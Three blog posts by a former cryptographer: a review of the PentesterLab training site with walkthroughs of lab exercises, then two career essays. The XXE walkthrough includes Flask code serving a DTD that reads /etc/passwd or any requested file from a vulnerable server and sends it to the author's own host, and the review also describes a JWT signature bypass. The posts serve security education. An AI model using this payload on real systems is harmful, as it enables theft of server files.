A Review of PentesterLab

stickers

After completing my fourth badge on PentesterLab, I have enjoyed it so much that I thought I would pass on the word on what a great learning resource it is. If I had to summarise it in one sentence, I would say an extremely well written educational site about web application pentesting that caters to all skill levels and makes it easy to learn at an incredibly affordable price (US$20 per month for pro membership, and there is no minimum number of months or annoying auto-renewal in signup). If you are uncertain whether it is for you, start by checking out the free content.

Without pro membership, you can still download many ISOs and try the exercises yourself locally. However with the pro membership will you get more content and you do not have the overhead time of downloading ISOs, spinning up VMs, and related activities.

This blog is about what you will get out of it and what you should know going in. In my opinion, the best way to do justice in describing PentesterLab is to talk about some of the exercises on the site. So at the end of the blog, I dive down into the technical fun stuff, describing three of my favourites. If none of those exercises pique your interest, then never mind!

For the record, I have no connection to the site author, Louis Nyffenegger. I have never met him, but I have exchanged a few emails with him in regard to permission to blog about his site. My opinion is thus unbiased — my only interest is blogging about things that I am passionate about, and PentesterLab has really worked for me.

What you can expect to learn

A few examples of what you can expect to learn from PentesterLab:

  • An introduction to web security, through any of the Web for Pentesters courses or Essential badge or the Introduction badge or the bootcamp.
  • Advanced penetration testing that often leads to web shells and remoted code execution, in the White badge, Serialize badge, Yellow badge, and various other places. Examples of what you get to exploit include Java deserialization (and deserialization in other languages), shell shock, out of band XXE, recent Struts 2 vulnerabilities (CVE-2017-5638), and more.
  • The practical experience of breaking real world cryptography through exercises such as Electronic Code Book, Cipher Block Chaining, Padding Oracle, and ECDSA. Note: Although the number of crypto exercises here cannot compete with CryptoPals (which is exclusively about breaking real world cryptography), at least at PentesterLab you get certifications (badges) as evidence of your acquired skills.
  • Practical experience bypassing crypto when there is no obvious way to break it, such as in API to shell, Json web token, and Jason web token II.
  • Practical experience performing increasingly sophisticated man-in-the-middle attacks in the Intercept badge.
  • Fun challenges that will really make you think in the Capture the flag badge.

The author is updating the site all the time, and it is clear that more badges and exercises are on the way.

In addition to learning lots of new attacks on web applications, I can also say that I personally picked up a few more skills that I was not expecting:

  • Learning some functionality of Burp suite that I had not known existed. I thought I knew it well before I started, but it turns out that there were a number of little things that I did not know, often picked up by watching the videos (only available via pro membership).
  • Learning more about various types of encoding and how to do it in the language I choose (in my case, Python). The Python functionality I needed was not given to me from the site, but I was drawn to learn it as I was trying to solve various challenges. For example, I now know how the padding works in base64 (which is important because not all of the encodings I got from challenges were directly feedable into Python), and I learned about the very useful urllib.quote.
  • Getting confidence in fiddling with languages that I had little experience in, such as PHP and Ruby.

What you should know going in

What you need depends upon what exercises you choose to do, but I expect most people will be like me: wanting to get practical experience exploiting major vulnerabilities that don’t always fall into the OWASP Top 10. For such people, I say that you need to be comfortable with scripting and fiddling around with various programming languages, such as Ruby, PHP, Python, Java, and C. If you haven’t had experience with all of these languages, that’s okay: there are good videos (pro membership) that help enormously. The main thing is that you need to be not afraid to try, and there might be sometimes where you might need to Google for an answer. But most of the time, you can get everything you need directly from PentesterLab.

I personally like to use Cygwin on Windows and/or a Linux virtual machine. The vast majority of the time, I was able to construct the attack payload myself (with help from PentesterLab), but there are a few exercises such as Java Deserialization where you need to run somebody else’s software (in this case, ysoserial). Although that comes from very reputable security researchers, I being ultra-paranoid prefer to run software I don’t know on a virtual machine rather than my main OS.

If you are an absolute beginner in pentesting and have no experience with Burp, I think that you will be okay. But you will likely depend upon the videos to get you started. The video in the first JWT exercise will introduce you to setting up Burp and using the most basic functionality that you will need. By the way, I have done everything using the free version of Burp, so no need to buy a licence (until you’re ready to chase bug bounties!)

Quality of the content

For each exercise there is a course with written material, an online exercise (pro membership only — others can download the ISO), and usually there are videos (pro members only).

You can see examples of the courses in the free section, and I think the quality speaks for itself. With pro membership, you get a lot more of this high quality course material. The only thing that I would suggest to the author is that including a few more external references for interested readers could be helpful. For example, the best place to learn about Java deserialization is Foxgloves security, so it would be great to include the reference.

The videos really raise the bar. How many times have you struggled through watching a Youtube video showing how to perform an attack with frustration of the presentation? You know, those videos where the author stumbles through typing the attack description (never talking), with bad music in the background? Maybe you had to search a few times before finding a video that is reasonably okay. Well, not here — all the videos are very high quality. The author talks you through it and has clearly put in a lot of thought into explaining the steps to those who do not have the experience or background with the attack.

Last, the online exercises are perfect: simple and to the point, allowing us to try what we learned.

Sometimes the supporting content is enough for you to do an entire exercise, other times you have to think a bit. Many videos are spoilers — they show you how to solve the exercise completely (or almost completely), but it is usually best to try yourself before falling back to the videos: you won’t get more out of it than what you put into it.

Finally, I want to compare the quality of PentesterLab to some other educational material that I have learned a lot from:

  • OSCP, which is infrastructure security as opposed to the web application security from PentesterLab. OSCP is the #1 certification in the industry, and is at a very reasonable price. It also has top quality educational material. I learned a lot doing OSCP, but the problem is that I did not complete it. I ran out of time (wife and kids were beginning to forget who I was) to work on it. And despite having picked up so many great skills from enrolling, at the end of the day it never helped me land a pentester job close to my desired salary level. I guess I needed to just try harder. The great thing about PentesterLab is that it’s not an all or nothing deal: you will pick up certification (badge) after certification (badge) as you go along. In terms of quality comparison, I’d say PentesterLab material is on par with OSCP.
  • Webgoat is the go-to free application for learning about penetration testing. I played with it a few years ago and learned a fair amount. There were a few exercises that I did not know how to solve, and I was rather frustrated that the tool did not help me. For example, in one of the SQL injection exercises, I needed to know how to get the column names in the database schema in order to solve it (I want to understand rather than just sqlmap it). I really think the software should have provided me some guidance on that (I know how to do that now, thanks to PentesterLab). PentesterLab just provides a lot more guidance and support, and has a lot more content.
  • Infosec Institute in my experience has been a fantastic source of free information to help learn application security. It covers a wide variety of topics in very good detail. But it lacks the nice features you get with PentesterLab pro membership: videos, and the ability to try online without the overhead of fetching resources from other places to get set up.  If your time is precious, the US$20 per month is nothing in comparison to what you gain from PentesterLab pro.

What most amazes me is that just about all of the content here was primarily made by a single person. Wow.

Three example exercises I really liked

Exercise: Play XML Entities (Out of band XXE)

XXE is a fun XML vulnerability that can allow an attacker to read arbitrary files on the vulnerable system. Although many XXE vulnerabilities are easy to exploit, there are other times where the vulnerability exists but the file you are trying to read from the OS does not get directly returned to you. In such cases, you can try an out of band XXE attack, which is what the Play XML Entities exercise is all about.

In the course the author provides an awesome diagram of how it all works, which he explains in detail:

steps

(Diagram copyright Louis Nyffenegger, used with his permission).

Briefly, the attacker needs to setup by having his own server (“Attacker’s server” in diagram) that serves a DTD. The attacker sends malicious XML to the server (step 1), which then remotely retrieves the attacker’s DTD (steps 2-3). The DTD instructs the vulnerable server to read a specific file from the file system (step 4) and provide to the attacker’s server (step 5).

So to start out, you need your own web server that the vulnerable application will fetch a DTD from. In this case, you are a bit on your own on what server you are going to use. I personally have experience with Heroku, which lets you run up to 5 small applications for free.

PentesterLab shows how to run a small Webrick server (Ruby), but I’m more of a Python guy and my experience is with Flask. Warning: Heroku+Flask has been a real pain for me historically, but I now have it working so I just continue to go with that.

To provide a DTD that asks for the vulnerable server to cough up /etc/passwd, I did it like this in Flask:

@app.route('/test.dtd')
def testdtd():
    dtd = '''
    <!ENTITY % p1 SYSTEM "file:///etc/passwd">
    <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'https://contini-heroku-server.com/recorddata?%p1;'>">
    %p2;'''
    return dtd

The recorddata endpoint is another Flask route (code omitted) that records the /etc/passwd file retrieved from the vulnerable server (my DTD is essentially equivalent to the one from PentesterLab).

This is all fine and dandy except one thing: /etc/passwd is not the ultimate goal in this exercise. Instead, there is a hidden file on the system somewhere that you need to find, and it contains a secret that you need to get to mark completion of the exercise. So, a static DTD like this doesn’t do what I need.

At first, I was manually changing the DTD every time to reference a different file, then re-deploying to Heroku, and then trying my attack through Burp. I thought I would find the secret file quickly, but I did not. This was way too manual, and way to slow. What an idiot I was for doing things this way.

Then I used a little intelligence and did it the right way: Make the Flask endpoint take the file name as a query string parameter, and return the corresponding DTD:

@app.route('/smart.dtd')
def dtdsmart():
    targetfile=request.args.get('targetfile')
    dtd = '''
    <!ENTITY % p1 SYSTEM "file:///''' + targetfile + '''">
    <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'https://contini-heroku-server.com/recorddata?%p1;'>">
    %p2;'''
    return dtd

I was very proud of myself for this trivial solution. Never mind the security vulnerability in it!

Overall, the course material gives a great description on what to do, but sometimes you have to bring in your own ideas to do things a better way.

Exercise: JWT II

Json Web Tokens (JWT) are a standard way of communicating information between parties in a tamper-proof way. Except when they can be tampered.

In fact, there is a fairly well known historical vulnerability in a number of JWT libraries. The vulnerability is due to the JWT standard allowing too much flexibility in the signing algorithm. One might speculate why JWTs were designed this way.

PentesterLab has two exercises on bypassing JWT signatures (pro members only). The first one is the most obvious way, and the way you would most likely pull it off in practice (assuming a vulnerable library). The second is a lot harder to pull off, but a lot more fun when you succeed.

In JWT II, your username is in the JWT claims, digitally signed with RSA. You need to find a way to change your username to ‘admin’, but the signature on it is trying to stop you from doing that.

To bypass the signature, you change the algorithm in the JWT from RSA (an asymmetric algorithm) to HMAC (a symmetric algorithm). The server does not know that the algorithm has changed, but it does know how to check signatures. If it is instructed to check the signature with HMAC, it will do so. And it will do it with the key it knows — not an HMAC key, but instead the RSA public key.

In this exercise, you are given the RSA public key, encoded. At a theoretical level, exploiting it may seem easy: just create your own JWT having username ‘admin’, set the algorithm to HMAC, and then sign it by treating the RSA public key like it is an HMAC key.

In practice, it’s not that simple. When I was attempting this, I was completely bothered by not knowing how to treat an RSA key as an HMAC key. I attempted in Python, fiddling around a few different ways for inserting the key to create the signature. None of them worked.

I thought to myself that this depends so much on implementation, and surely there must be a better way of going about things than random trials. Hmmmm, somehow the author must have left a hint on how to encode it so we can solve the exercise…

light-bulb16-177x240

Exercise: ECDSA

According to stats on the site, the ECDSA looks to be the most challenging exercise. I decided to go after it because I was once a cryptographer and I was excited to see an exercise like this.

Honestly, most people will not have the cryptographic background to do an exercise like this, particularly because ECDSA is in the capture the flag badge, so there is no guidance. You are on your own, good luck! But I’ll drop you a hint.

In the exercise, they give you the Ruby source code, which is a few dozen lines. The functionality of the site allows you to register or login only. Your goal is to get admin access.

From the source code you will see that it digitally signs with an ECDSA private key a cookie with your username in it. To check the cookie, it verifies the signature with the public key.

The most surprising thing here is that you don’t even get the public key (nor the private key, of course). You have to somehow find a way to create a digitally signed cookie with the admin username in it, and you have absolutely nothing to go by other than the source code.

I promised you a hint. Look for a prominent example of ECDSA being broken in the real world.

Concluding Remarks

I think it is clear that I really, really like this website and highly recommend it. Having said that, it is always better to get more than one opinion, and for that reason, I invite other users of PentesterLab either to comment here or on reddit about their experience with the website.

Speak up people!

Advertisements

Why I left cryptography

This blog is a follow-up on my previous blog, How I became a cryptographer, which describes the very long, intense journey I took to get to the state where I could make a living publishing research in cryptography.  A few people have asked why I left, so here I give my reasons.  This blog may be useful to people who are uncertain whether they want to make a similar journey.

Feeling disconnected from the real world

The biggest reason why I left is that I felt cryptography research was more focused on the mathematics than it was on the real world applicability.  As much as I love the mathematics, algorithms, and puzzle solving, I wanted to work on research that mattered.  But the longer I stayed in cryptography, the more disconnected I felt from the real world.

Truthfully, the restrictions I put on myself limited me: I did not want to leave Sydney and I did not want to spend the majority of my time teaching.  Had I not kept those restrictions, I could have had more chances.  With them, the only job that I found to keep me going was to be a PostDoc research fellow.

As a PostDoc research fellow, you are typically paid by a government research grant that may last a couple years.  When you are paid by such a grant, you need to deliver results that are in agreement with that grant so that in the future, you have evidence that can be used to apply for similar grants to keep you going.  And that cycles.

If you are really good and daring, you might stray from the research grant topic once in a while to see if you can make an impact somewhere else.  But your time for that is very limited.

I started on research grants involving number theory, then moved to research grants about cryptanalysis.  In this time, I got my top two research results, one of which influenced the field but unfortunately will never be used in the real world, the other of which had an important impact on what NIST declares acceptable today.  Also during that time, I did a lot of research that had hardly any relevance to the real world.

While being a PostDoc, I saw a lot of new crypto conferences popping up, and a lot of new crypto researchers publishing at new conferences.  Let’s just say that this was not due to an increase in quality in the field.  Instead, there were more opportunities to publish irrelevant research, which a researcher could use as evidence of making an ‘impact.’

I wanted to know what were the right problems to work on, but the longer I stayed in the field, the less vision I had on where to look.  I was stuck in the cycle, with no vision of what the real world needed.  I simply was not going to get that vision by continuing to do what I was doing.

Disillusionment

When designing a cipher, every cryptographer will tell you the first requirement.  Nobody will look at it unless it follows Kerckhoffs’ principle: the security of the cipher should depend upon the secret key and nothing else.  No secret algorithms.

With the AES selection competition between 1997-2000, several cryptographers tried to raise the bar.  Instead of just coming up with a design and relying on others to attack it, the designers should put some effort in themselves to show that it does not trivially fall to common attacks such as linear and differential cryptanalysis.  I myself worked with the RC6design team (though I was not a designer myself), and we provided extensive analysis on the security of RC6.  We were proud of this.

However, a competitor algorithm went much further.  Not only did the designers attempt various cryptographic techniques against their design, but they also proved (under reasonable assumptions) that the design was resistant to first order linear and differential cryptanalysis.  The proof was via the Wide Trail Strategy.  Their cipher, Rijndael, was the favourite amongst the majority of the cryptographers, and ultimately won the AES competition.  Even as a competitor to them, there is no doubt in my mind that the right cipher won.

This was great.  With the turn to the 21st century, we had a new standard of excellence.  Moving the bar beyond the 19th century Kerchoffs’ principle, we now require designers to put substantial effort into analysing and proving the security of their design before presenting it to us.  Right?

That was my thought, but it is totally wrong.  For two reasons:

  • With the increase in the number of crypto conferences and crypto researchers, there was no possibility of enforcing a standard of excellence.  The doors were (and still are) wide open to publish a low quality design in a low quality conference.
  • Ultimately a fair number of designs get used in the real world long before going through a rigorous analysis and peer review process.

Sure, some designs start getting attention after they have been in use for a while, and by that time we either find problems in them or else fall back to “this algorithm has been in use for a long time and nobody has found problems with it, therefore we can trust it.”  And thus, the science is not maturing.

It is a lot easier to design something than it is to break something.  For every one man-hour used to design, it can take one or two orders of magnitude more man-hours to analyse, or maybe even more (depending upon the skills of the designer).  The cryptanalysist simply cannot keep up with the designers, so we instead declare that we will not look at their design for whatever reason.

I wish cryptography would get beyond Kerchoffs’ principle.  I wish the effort between design and cryptanalysis was more balanced.  I wish we could give designers more practical advice on what it takes for their cipher to get attention.

I don’t believe that will ever happen.

A lot of labour for little reward

I started out with an attitude like Paul Erdős, but eventually materialism crept in.  It’s a lot easier to be idealistic when you are young and single than it is when you’re beginning to settle down and think about having a family.

As my software skills were dated, I felt very lucky that I could get out when I did.  Fortune brought me to a fantastic printer research company in Sydney that were mainly looking for smart people.  They offered me a good salary, and I was happy to leave cryptography behind.

I was able to maintain a decent salary, but it took me a good 7 years or so before I got to the point where I had strong enough skills in demand so that I could change employment without too much difficulty if I needed to.

Every now and then I get a call from a recruiter about a bank or other large company looking to hire a cryptographer.  They don’t need a researcher, instead somebody who really knows and can advise about cryptography.  I stopped pursuing these potential opportunities: they pay well, but my interests in security go way beyond cryptography, so I don’t want to pigeon-hole myself as a cryptographer only.

What I do today

Now I do more general security, which includes code review, penetration testing, and architecture/design.  I have strong skills in web security and embedded security.  I like having this breadth of expertise, but I also have an depth of expertise in cryptography, which distinguishes me from most people who do similar work.  The cryptography background is definitely a benefit.  But I am sure glad that I do a lot more than just that.

 

How I became a cryptographer

One of the questions that keeps on appearing over and over in Reddit’s /r/crypto is how to become a cryptographer.  For example this and this and this and this and this.

I often reply to these in comments. But given that the questions keep coming up, I thought it would be good to write up something more complete that I could reference back to. In doing so, I hope I can pass on some valuable tips that I learned the hard way on what it takes to “make it.”

When I say “make it”, I’m referring to being able to make a career as a cryptographer and nothing more. This blog assumes you understand what I mean by “cryptographer”: see Schneier’s article from 1999.  In short, I am showing the path I went down in order to be able to make a living publishing research papers on cryptography, which is not the same as being a practitioner using cryptography.

Often people replying to “how to become a cryptographer” say get a PhD in cryptography and publish lots of papers. That does not answer the question of “how do I qualify myself to get a PhD?” or “How do I learn to think like a researcher?” or “How do I do research?” Nor does it tell how to do significant research. I hope my blog provides some guidance on these questions.

I myself consider that I made it to the level of mediocrity as a cryptographic researcher. I certainly was no star. But I also started late in the game in terms of developing the way of thinking like a researcher. I believe most of the others had the tendency towards mathematical thinking from a young age. Because of that, I had a lot of catching up to do to compete with many from the field. If you’re reading this blog, then you might be like I was, and thus I hope it provides some helpful tips to you that I had to learn the hard way.

Here are what I believe are the 7 magic ingredients to becoming a cryptographer (in no particular order):

  • You need to be a brilliant mathematician (amended advice given here).

  • You need to be very strong in algorithms, including development and analysis.

  • You need to work your tail off.

  • You need to be creative in problem solving.

  • You need to be passionate about the field you are in.

  • You need to surround yourself with experts in the field.

  • You need a bit of luck (but luck happens when preparation meets opportunity!)

Now I tell my story.

My mischievous youth

I believe that those who have achieved a far-reaching life goal can look back at points from their early ages that contributed to where they are today, so this is where I start.

One trait I had that really contributed to my eventual career was my passion for creative puzzle solving. I personally was not so keen on listening to others (which is not good, by the way): instead I spent many hours trying to find solutions myself. In the early days, this manifested in examples like coming up with my own way to solve the Rubik’s cube, never reading the book.

I guess around 10 years old, I started using a computer and learning to program it. It spent many hours, not shy to sacrifice a whole weekend, to make computer games. By the time I got my first 300 baud dial-up modem, I learned about bulletin board systems (BBSs) where nerds like me developed online social lives. For those who don’t know about BBSs, think of it as like a stone-age Facebook.

It didn’t take long before thoughts of mischief on BBSs popped into my head. I spent many hours reading source code of the main BBS that Commodore 64 users were using and thinking about how I could do stuff that the system was not intended to do. I had particular interest in destructive actions solely for the purpose of childhood entertainment. My specialty was crashing (i.e. Denial of service) BBSs. Yes, I was extremely immature.

By age of 16, I was lucky to have access to a local free-to-use Unix system that I could dial into. It didn’t take long before I was exploring the cool /etc/passwd file. A friend of mine had discovered the algorithm that created the password hashes, and I spent many, many hours with no success in trying to invert that algorithm. This was my first exposure to modern cryptography, though at the time I did not know that I was trying to invert a hash function based upon the Data Encryption Standard (DES).

Being exposed to a Unix system and the C programming language 2 years before starting University gave me a head start. Knowing how to program and hack also made me a good candidate for becoming a cryptographer. But I was lacking what may be the most important ingredient: I was not a brilliant mathematician. Don’t get me wrong: I was decent at mathematics, but by no means brilliant. Maybe I was in the top 15% in my class. That’s nothing compared to most cryptographers who were surely the #1 in their school and beyond. For example, looking at the list of Putnam Fellows (top undergraduate mathematicians in the USA and beyond), one will see several cryptographers on the list.

University learning: changing the way I think

Because I was lucky enough to have my parents pay for my University education in America, I was free to commit a lot of time to learning. I wanted my parents to know that their money was not being wasted, so that drove me to work hard. Extremely hard work.

At the same time, I was going through some phase of not trusting anything. This was back in the Cold War days, when we were told that Russian people are evil and they all wanted to kill us and eat our brains. I was not that gullible, and the skepticism I had developed towards authoritative sources of information ended up being the essential ingredient in changing my way of thinking towards the direction of a researcher.

I did pretty well in my classes, though I often came up with reasons for not believing what they were teaching me, especially physics. I looked to come up with an excuse on why it could be wrong. Can the science of physics be wrong? In order to prove something about reality, you need to make assumptions about reality, and that’s the part that I could always question. Footnote: I no longer take such an extreme skepticism towards everything.

After dismissing physics, next came mathematics. How can I show it is wrong? This is an interesting question, because I like many people “learned” mathematics by “memorising the formula” and using it to solve problems. But if I am questioning everything, I can’t take the approach. Instead, I need to disprove the formula. This became a whole way of thinking for me.

When you go to University, you get lectures that you take notes from and a book to read. Which one am I supposed to learn from? I don’t know. I’ll try both.

In the end, I could not make any sense out of my notes, but I could learn from reading the book. The book gives you so much more information that can be packed into a one hour lecture, but the consequence is that you need to spend a lot more time learning. And if you want to disprove the book, you have to spend even more time!

So there I went: reading every single sentence and formula from the book, one-by-one, and trying to disprove it. And absolutely not going to the next one until I am 100% convinced that the sentence or formula is logically correct. To my surprise, I never came across a single thing I could disprove (other than perhaps small mistakes that were easy to correct). And this is what attracted me to mathematics, which ultimately provided me with the thought process I needed to become a cryptographer.

This I believe illustrates an important difference between how most people learn versus how people who end up becoming cryptographers/mathematicians learn. Most people trust the authoritative source. If you want to be a cryptographer, you cannot have that mindset. Instead, you need to question everything and confirm that everything you are being told is true.

Understand why. We cryptographers all the time are seeing new ciphers with miraculous security claims. If we were to not question things like we do, then there would be a whole lot of snakeoil used in the real world. When a mathematician reviews a proof, he looks for anyway that it may be incorrect – especially edge cases come into play. Similarly, if you can find any exception to a proof or claim of security for a cipher (especially edge cases come into play), that could be the key to breaking it. Sometimes finding flaws in security proofs have huge implications even if the flaw does not translate into an immediate break of the construct.

I later learned that you need to go beyond that: you have to be able to prove the same thing you are reading, not just check that it is true. This of course is an even bigger time commitment, but you eventually learn to figure out the key points of the proof and then reconstruct the rest of it yourself.

When I did homework, I went to the library. Before I started, I would look around and carefully remember anybody I could see around me. After that I would start doing homework, giving full attention to my homework until it was all done. Then, I would look around to see if there is anybody still there that got there before me: my rule was nobody can study harder than me. If I found somebody, it meant that I needed to keep on studying. If there was no homework left to do, find a book to read on my current subject and learn a lot more than what the notes and the other kids in the class are learning.

For some classes, I really enjoyed this. For example, in discrete mathematics / combinatorics, I went to great extents to try to find problems I could not solve. I had mastered the class textbook, which I loved, but I was able to find some very old books in the library that were 100% dedicated to tricky combinatorial problems, and I worked out every one of them until I got to the point that I could solve just about anything thrown at me.

As you can see, I worked my tail off at the University and changed my way of thinking. I did not know it at the time, but this was actually my “catch up” time for getting my mind thinking the way the brilliant mathematicians who end up becoming cryptographers think.

I ended up with a double degree in mathematics and computer science. I did quite well, getting almost all A marks in mathematics and computer science, but not always the same success in other subjects. In my third year of University, I did a graduate level class in cryptography, which I loved, and decided that I wanted to do as a career. I just didn’t know how, but I did know that graduate school is probably the right direction forward.

Graduate school: learning to do research

My parents were generous enough to pay for my undergraduate education and expenses, but now that I was all grown up, it was time for me to cover myself.

I tried very hard to get scholarships to help pay for my graduate school education. But at the end of the day, I was competing with students who already have patents, publications, and the like. Also, I was against all-A students and students that have scored perfect on their GRE. How could I possibly compete? The answer was that I needed to earn my way by being a teaching assistant (TA). Being a TA is a huge time commitment, which takes away from the learning that I really wanted to do, but it was the only way I could go forward.

I got accepted to some decent Universities, but top schools like MIT and Stanford were quick to turn me down. Of the ones that accepted me and offered me enough income from TA to pay my way, I decided to go to University of Wisconsin-Milwaukee Computer Science Department, which had a few cryptography professors. I was considered the star student of the time, but in retrospect, this guy turned out to far out-shine me.

I spent two years there taking classes and doing research. My research focus was number theory, particularly integer factorisation. Although I did well in mathematics as an undergrad student, it seems that one really needs to have a lot deeper mathematics background to do innovative research in factoring, so I mainly focused on implementation.

At that time, Arjen Lenstra at Bellcore was in his early days of what would be his long streak of smashing integer factoring records. I loved his research, but I also viewed him as my competitor: if I am going to “make it”, I need to beat him.

Just as an undergrad, I was working my tail off. I was 100% committed to intellectual development. When I wasn’t doing TA duties, class work, or research, I was reading the Usenix groups such as sci.crypt and sci.math, and contributing to discussions. I also spent a lot of time breaking amateur ciphers that were posted on sci.crypt.

After 2 years, I was completing my Masters Degree and was exhausted from all the hard work. I decided that I needed to take a whole summer break just to gather myself. But fortune had another plan for me.

I received an email from Arjen Lenstra. This was not long after he had factored RSA-129, which got international press. Arjen was looking for a summer intern to work with at Bellcore.

There I was: exhausted, feeling as if I had spent 6 years fighting Mike Tyson, needing a rest, and then getting an email from my “competitor” asking if I wanted to work with him. What was I to do?

Thankfully, my parents and friends had set my mind straight. I was wanting to turn it down, but they said I would be absolutely crazy to do it, and they were right. I took the opportunity, which turned out to be the single most important decision in my career. Let me be 100% unambiguous: if I would have declined this opportunity, I would never had made it as a researcher. Luck definitely played a role for me.

One of the most important things I learned from Arjen is that when I develop new algorithms, I need to prove that they are correct. This is obvious to a researcher, but it was not obvious to me. I had ways of solving problems that he wanted me to work on, but he said he wanted proofs before I went ahead and implemented them. And so I did.

In all honesty, I didn’t feel like I did great working for him that internship, but I had enough background in what he wanted me to work on to make me succeed. As I said, I was exhausted from all the studying and TA duties, so I did not commit 100% like I had done for University study. I also had planned to take my time off to gather myself at the end of the 3 month internship.

To my surprise, as the internship came to an end, he asked what I was doing after it. I said “nothing.” He then asked why not stay working there until the end of the year. Hmmm, the pay is good, the experience is great, and what he wants me to work on is exactly what I want to work on. I’ll take it.

I spent the next approximately 5 months working on a project with Arjen that really excited me. We were using the MasPar massively parallel computer to implement fast linear algebra algorithms to solve factoring matrices. We ended up writing a research paper on it, but it never got submitted anywhere. This was my fault: I was too busy to finish it off, and I thought it was research that nobody would be interested in. I was wrong.

During that time, I got back into the mindset of a researcher and I seem to have forgotten that I needed time to gather myself. I decided that having a Masters in Computer Science was not really what I needed: instead I needed an advanced degree in Mathematics. And I was 100% certain that I wanted to do that working for Carl Pomerance at the University of Georgia.

Carl was a well known star in Number Theory. He along with Andrew Granville and Red Alford just completed a proof that there are infinitely many Carmichael numbers, which excited me. Carl was also well known for factoring. I didn’t realise it at the time, but one of the reasons why everybody knew Carl is because he wrote his research so well that even an idiot like me could understand it. Not many mathematicians have that skill.

I thought I would be able to comfortably get into the University of Georgia, but I was wrong. On paper, I was borderline to get into their Masters program, and especially, getting a TA job was going to be tough.

Completely out of character for me, I decided to make a 10 hour drive to Georgia to meet with Carl and other people at the University, and convince them that they should accept me as a graduate student. I wonder to this day if they ever had anybody else approach them like that. I went there, talked to a number of Professors, told them about who I am and what I wanted to do. If nothing else, they saw the passion for mathematics and research in my eyes, and combining that with a letter of recommendation from Arjen, they decided to give me a shot. I got accepted and was offered a TA position.

Truthfully, I don’t know if they really believed that I would make it, and rightfully so. I did not know about the level of competition I was going to find at this University, but as before, I was able to make up the difference by extremely hard work. This was also the time that I learned that checking the proofs is not enough: you need to be able to prove everything in the book yourself.

I surprised a lot of people and eventually they accepted me as a PhD student. Carl Pomerance and others really believed in me. But eventually, 8 years of intense University studying had clobbered me. I was beat and financially in debt, and I really needed a break. Carl tried hard to convince me to go through with the PhD, but I just couldn’t find the drive any longer. I bailed out with a Masters degree.

At this point I had a double Bachelors degree in Mathematics and Computer Science, a Masters degree in computer science, a Masters degree in Mathematics, and letters of recommendations from big shots Arjen Lenstra (pretty much the top computational number theorist ever) and Carl Pomerance (big shot analytical number theorist). Suddenly, how I looked on paper was representative of how good I considered myself to be. And with that, I got a position in industry as a research associate that I believe I deserved, working for RSA Labs at RSA Data Security.

The only catch is, even though I did research to get my Masters degrees, my research was not particularly innovative. So I can’t call myself a researcher yet.

Getting my first publications

It took me a bit of luck to upgrade my skills and get myself where I needed to be in University and graduate school, but at this point I believe that I truly was the best person for the position I took at RSA Labs. Having said that, what an amazing opportunity it was to see minds like Ron Rivest and Yiqun Lisa Yin in action.

It happened to be a convenient time to work there, as there was a call for an Advanced Encryption Standard and RSA Labs had one of the top candidates: RC6.

Ultimately, I had no contribution making it to the final design of RC6, but I was able to make contributions to the analysis. My tendency to disbelieve anything that lacked a proof was instrumental for me in attempts to check the heuristic analyses that the team did to understand the security. It turned out that the heuristic analyses didn’t hold for some simplified variants of RC6, which resulted in my first publication, with Ronald Rivest, Matt Robshaw, and Yiqun Lisa Yin as coauthors.

It was not that difficult to get this result.  I wrote a program to try to verify heuristic claims.  I saw that those claims were not always correct.  I spent time understanding why the claims do not work via debugging and analysis, and worked with my colleagues to develop the analysis further.  Then formal proofs, write-up, and publication.

I did a fair amount of work with Yiqun Lisa Yin, who helped me get a few other publications coauthored with her. She is a brilliant mind and knew where the research community was going. She had the great ideas and I helped where I could.

Despite my success in getting publications, I felt: (1) the results are not significant enough to make me feel as I have “made it” as a researcher, and (2) except in the one publication above, the main ideas were largely coming from other people rather than myself.

Getting significant research results

The position at RSA Labs lasted about 2 years, at which time the company who bought out RSA decided that research in cryptography was not so important, so cut off the West coast research arm.

For a number of years after that, I went back and forth between academia and industry, seeking another position like I had at RSA Labs. I wanted to be do research but also develop software. It turned out that such positions are extremely rare.

I had a couple positions that are normally for post Doctorate students despite not having a Doctorate. One of those was at Macquarie University, with the aim of doing research in Number Theory.

Unfortunately, I did not have strong enough background to do significant research in Number Theory, at least I didn’t think so. I did get a few crypto publications during this time, but I felt they were fairly small results. Towards the end of the appointment, I was ready to give up.

(Side note: I actually did my PhD while at the same time holding this PostDoc position).

It was my office-mate, Ron Steinfeld, who suggested that we look at hash functions. He had some ideas that I was happy to work on him with.

Somehow, I got distracted and started thinking about a hash function built by multiplying small primes together. I wrote a simple equation on the whiteboard and looked at it. I then noticed that if there is a collision, something remarkable happens.

I turned away and thought, “no I need to get back to number theory research.” Gratefully, the little man in my head shook my brain and screamed: “What’s the matter with you, idiot! There’s something interesting here!” So I went back to the equation, thought about it more, and then convinced myself that there is opportunity here. I showed it to Ron, and he said this looks like a breakthrough.

Ron helped me formalise it and justify its significance, and we wrote it up in pretty good detail. Igor Shparlinski helped us in an essential analysis part, but he said he didn’t think his contributions were significant enough to coauthor. We then showed it to Arjen, who had an idea to make it faster and helped the overall writeup.

Finally, I had my breakthrough. The VSH hash function was published in Eurocrypt. The paper happened just after the Wang et al were breaking all the practical hash functions. I had solved the right problem, in the right way, at the right time. Or at least so I had thought.

Another significant area I worked on was HMAC. Given that the hash functions are broke, what are the implications to it? Yiqun led this. My main contribution was coming up with practical algorithms to attack HMAC and NMAC given hash collisions, which was significant to the paper. So this was my second significant research result.

Finally, I feel like I had made it as a cryptography researcher. Finally I started having confidence that I could make a career doing this. Ironically, I decided to not do so.

Additional tips for those aiming to become cryptographers

I would like to think I have learned a thing or two about research in all these years of effort. So here is the advice I pass on to those who are just making the journey.

The number one advice is read Richard Hamming’s advice on how to do great research. I first discovered this while doing my “PostDoc” research at Macquarie University. I must have read this at least 10 times thereafter. You need to know where the field is going to make significant contributions. If you don’t work on the right problems, you’re not going to have an impact. Surrounding yourself by experts in the field will help guide you in making an impact. Don’t be afraid of going after the big problems.

Another point from Hamming is selling your research. He is so right. When I first got publications, I considered the writeup the boring part: I had solved a problem, now I need to waste all this time writing it up rather than go out and solve more problems? Absolutely the wrong attitude. Think about the people you look up to as researchers. You might have names like Dan Boneh, Adi Shamir, etc…. If your list is anything like mine, you may notice that they are great communicators. They write well and they present their research well. If you can clearly explain and motivate the problem you are trying to solve, it will not only attract others to your research, but it will also help you better understand the value of your research and the interesting directions you can go.

Doing research is frustrating. One of the things that threw me off is that although I was very good at a lot of things, I just did not have the mathematical depth of many people in the field. How could I do compete with them?

